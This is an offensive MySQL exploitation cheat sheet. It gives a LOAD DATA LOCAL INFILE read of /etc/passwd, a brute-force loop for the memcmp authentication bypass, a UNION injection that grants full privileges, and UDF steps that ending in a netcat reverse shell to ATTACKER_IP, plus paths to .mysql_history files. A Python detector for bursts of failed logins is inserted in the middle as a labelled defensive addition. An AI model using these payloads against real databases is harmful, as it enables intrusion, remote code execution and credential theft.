If direct file reading is blocked, try LOAD DATA LOCAL INFILE:
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE temp_table FIELDS TERMINATED BY '\n';
Requires LOCAL keyword and a temp table.
Affected versions: MySQL 5.0.x – 5.1.63, 5.5.x – 5.5.24, 5.6.x – 5.6.6
Exploit: When memcmp() returns 0, authentication succeeds even with the wrong password.
Exploit script (bash):
for i in `seq 1 1000`; do mysql -u root -pwrong -h target.com -e "select 1" 2>&1; done
~1 in 256 chance of success.
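Detection side, as an added example that is not part of the original page: the retry loop above shows up as a dense run of failed logins for one account from one host. The sketch assumes MySQL 5.7-style error-log lines with "Access denied" notes enabled; the function name, threshold, window and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed line shape: MySQL 5.7+ error log with access-denied notes enabled.
# Older servers use a different timestamp format; adjust the regex for them.
DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})\.\d+Z \d+ \[Note\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)' "
    r"\(using password: YES\)"
)

def find_bursts(lines, threshold=20, window=timedelta(seconds=10)):
    """Return {(user, host): peak} for sources whose failed logins
    reach `threshold` inside a sliding `window`."""
    recent = defaultdict(deque)   # per-source timestamps still inside the window
    peaks = {}
    for line in lines:
        m = DENIED.match(line)
        if not m:
            continue              # unrelated log line
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
        key = (m["user"], m["host"])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window: # drop attempts that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks

# Constructed sample: 30 failures in 3 seconds from one host, two slow
# failures from another host, and one unrelated line.
SAMPLE = [
    f"2024-05-01T12:00:{i // 10:02d}.{i % 10}00000Z {100 + i} [Note] "
    f"Access denied for user 'root'@'203.0.113.7' (using password: YES)"
    for i in range(30)
] + [
    "2024-05-01T12:01:00.000000Z 200 [Note] Access denied for user "
    "'app'@'198.51.100.4' (using password: YES)",
    "2024-05-01T12:05:00.000000Z 201 [Note] Access denied for user "
    "'app'@'198.51.100.4' (using password: YES)",
    "2024-05-01T12:05:01.000000Z 0 [Note] Event Scheduler: Loaded 0 events",
]

if __name__ == "__main__":
    for (user, host), peak in find_bursts(SAMPLE).items():
        print(f"burst: {peak} failed logins for {user}@{host}")
```

A flagged source that is followed by a successful session for the same account is the case to investigate first.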
You have the DB. Now extract the crown jewels.
When INTO OUTFILE is blocked, HackTricks guides professionals toward UDF exploitation. This is an advanced technique that involves loading a custom binary library into MySQL to execute system commands.
Example:
http://example.com/vulnerable-page?id=1 UNION SELECT GRANT ALL PRIVILEGES ON *.* TO 'username'@'%' IDENTIFIED BY 'password' -- -
1. Compile shared library (lib_mysqludf_sys.so)
Download from MySQL UDF Exploit or Metasploit:
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so
2. Write binary to plugin dir (hex encoded to bypass restrictions):
SELECT 0x7f454c4602... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
(Full hex dump omitted for brevity – generate with xxd -p udf.so | tr -d '\n')
3. Create UDF functions:
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';
CREATE FUNCTION sys_exec RETURNS INT SONAME 'udf.so';
CREATE FUNCTION sys_open RETURNS INT SONAME 'udf.so';
4. Execute OS commands:
SELECT sys_eval('id');
SELECT sys_exec('nc -e /bin/bash ATTACKER_IP 4444');
Windows equivalent: udf.dll → sys_exec('whoami').
cat ~/.mysql_history
/home/user/.mysql_history
/root/.mysql_history